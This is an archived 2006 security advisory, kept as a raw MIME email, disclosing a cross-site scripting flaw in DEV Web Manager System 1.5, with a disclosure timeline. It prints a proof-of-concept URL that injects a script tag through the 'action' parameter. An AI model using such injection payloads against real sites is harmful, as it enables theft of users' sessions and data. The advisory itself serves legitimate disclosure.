Vulners
Lucene search
DEVWeb-1.5.txt
`This is a multi-part message in MIME format.
------_=_NextPart_001_01C6F219.260F14A2
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
-=3D[--------------------ADVISORY-------------------]=3D-
-=3D[ =
]=3D-
-=3D[ DEV Web Manager System <=3D 1.5 ]=3D-
-=3D[ =
]=3D-
-=3D[ Author: CorryL [[email protected]] ]=3D-
-=3D[ www.x0n3-h4ck.org ]=3D-
-=3D[----------------------------------------------------]=3D-
-=3D[+] Application: DEV Web Manager System
-=3D[+] Version: 1.5
-=3D[+] Vendor's URL: http://dev-wms.sourceforge.net/
-=3D[+] Platform: Windows\Linux\Unix
-=3D[+] Bug type: cross-site script [XSS]
-=3D[+] Exploitation: Remote
-=3D[-]
-=3D[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=3D[+] Reference: www.x0n3-h4ck.org
..::[ Descriprion ]::..
DEV web manager system one application web based on php
..::[ Bug ]::..
this system e' affect from a bug of type XSS=20
a attaker to use the bug in order to steal sensitive information=20
to the users or admin
..::[ Proof Of Concept ]::..
http://web =
site/index.php?session=3D0&action=3D>"><ScRiPt%20%0a%0d>alert(775195196)%=
3B</ScRiPt>
..::[ Workaround ]::..
Nothing
..::[ Disclousure Timeline ]::..
[07/10/2006] - Vendor notification
[11/10/2006] - Vendor Response
[17/10/2006] - No patch relase from vendor
[17/10/2006] - Public disclousure
*********************
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!
Per maggiori informazioni vai su: =
http://adsl.alice.it/servizi/alicebasic.html=20
------_=_NextPart_001_01C6F219.260F14A2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Diso-8859-1">
<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
6.5.7650.21">
<TITLE>{x0n3-h4ck} DEV Web Manager System <=3D 1.5 XSS =
Exploit</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<P><FONT =
SIZE=3D2>-=3D[--------------------ADVISORY-------------------]=3D-<BR>
-=3D[ &n=
bsp; &nb=
sp; &nbs=
p;  =
; =
]=3D-<BR>
-=3D[ DEV Web Manager System =
<=3D 1.5 =
]=3D-<BR>
-=3D[ &n=
bsp; &nb=
sp; &nbs=
p;  =
; =
]=3D-<BR>
-=3D[ Author: CorryL =
[[email protected]] ]=3D-<BR>
-=3D[ &n=
bsp; &nb=
sp; =
www.x0n3-h4ck.org =
]=3D-<BR>
-=3D[----------------------------------------------------]=3D-<BR>
<BR>
<BR>
-=3D[+] Application: DEV Web Manager System<BR>
-=3D[+] Version: 1.5<BR>
-=3D[+] Vendor's URL: <A =
HREF=3D"http://dev-wms.sourceforge.net/">http://dev-wms.sourceforge.net/<=
/A><BR>
-=3D[+] Platform: =
Windows\Linux\Unix<BR>
-=3D[+] Bug type: cross-site script =
[XSS]<BR>
-=3D[+] Exploitation: Remote<BR>
-=3D[-]<BR>
-=3D[+] Author: =
CorryL ~ corryl80[at]gmail[dot]com ~<BR>
-=3D[+] Reference: www.x0n3-h4ck.org<BR>
<BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
DEV web manager system one application web based on php<BR>
<BR>
<BR>
..::[ Bug ]::..<BR>
<BR>
this system e' affect from a bug of type XSS<BR>
a attaker to use the bug in order to steal sensitive information<BR>
to the users or admin<BR>
<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
<A HREF=3D"http://web">http://web</A> =
site/index.php?session=3D0&action=3D>"><ScRiPt%20%0a%0d=
>alert(775195196)%3B</ScRiPt><BR>
<BR>
<BR>
..::[ Workaround ]::..<BR>
<BR>
Nothing<BR>
<BR>
..::[ Disclousure Timeline ]::..<BR>
<BR>
[07/10/2006] - Vendor notification<BR>
[11/10/2006] - Vendor Response<BR>
[17/10/2006] - No patch relase from vendor<BR>
[17/10/2006] - Public disclousure<BR>
<BR>
<BR>
*********************<BR>
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!<BR>
Per maggiori informazioni vai su: <A =
HREF=3D"http://adsl.alice.it/servizi/alicebasic.html">http://adsl.alice.i=
t/servizi/alicebasic.html</A> </FONT>
</P>
</BODY>
</HTML>
------_=_NextPart_001_01C6F219.260F14A2--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4